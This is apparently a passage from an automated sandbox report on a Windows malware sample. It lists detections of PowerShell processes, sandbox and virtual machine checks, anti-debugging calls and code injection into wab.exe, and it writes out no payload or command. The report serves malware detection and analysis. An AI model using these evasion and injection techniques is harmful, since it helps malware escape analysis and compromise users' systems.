                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 4B40EE3
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6053Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3812Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5527Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4278Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3468Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5525Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1759Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.6 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4608Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2128Thread sleep count: 5527 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2064Thread sleep count: 4278 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1708Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1916Thread sleep count: 3468 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5648Thread sleep count: 31 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5608Thread sleep count: 5525 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5608Thread sleep time: -16575000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 3468 delay: -5Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_20EA10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_20EA10F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_20EA6580 FindFirstFileExA,11_2_20EA6580
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00418981 memset,GetSystemInfo,16_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: wscript.exe, 00000000.00000003.2152753162.000001326F926000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: est Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization Servicevmic)3
                Source: wscript.exe, 00000000.00000003.2152834117.000001326F949000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
                Source: wscript.exe, 00000000.00000003.2152753162.000001326F903000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2156513364.000001326F912000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2153017346.000001326F90D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2152946040.000001326F90C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155382787.000001326F90F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2153515152.000001326F90E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceStoppedOKvmicvmsessionvmicvmsessionProvides a mechanism to manage virtual machine with PowerShell via VM session without a virtual network.Share ProcessManualNormalC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V PowerShell Direct ServiceHyper-V PowerShell Direct ServiceWin32_ServiceWin32_ComputerSystemuser-PCvmicvmsession
                Source: wab.exe, 0000000B.00000002.3429074546.00000000050B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWq
                Source: wscript.exe, 00000000.00000003.2152753162.000001326F903000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2156513364.000001326F912000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2153017346.000001326F90D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2152946040.000001326F90C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155382787.000001326F90F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2153515152.000001326F90E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                Source: wab.exe, 0000000B.00000002.3429074546.0000000005068000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3429074546.00000000050B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: wscript.exe, 00000000.00000003.2152834117.000001326F949000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ 'A[
                Source: bhv88BF.tmp.16.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                Source: wscript.exe, 00000000.00000002.2156615721.000001326F939000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: est Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization Servicevmic
                Source: powershell.exe, 00000002.00000002.2604863552.000001DB95C2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_17-34129
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_079C73B0 LdrInitializeThunk,5_2_079C73B0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_20EA60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_20EA60E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,16_2_004044A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_20EA4AB4 mov eax, dword ptr fs:[00000030h]11_2_20EA4AB4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_20EA724E GetProcessHeap,11_2_20EA724E
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_20EA60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_20EA60E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_20EA2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_20EA2B1C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_20EA2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_20EA2639

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi64_1908.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1908, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3892, type: MEMORYSTR
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3BA0000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 293FD50Jump to behavior
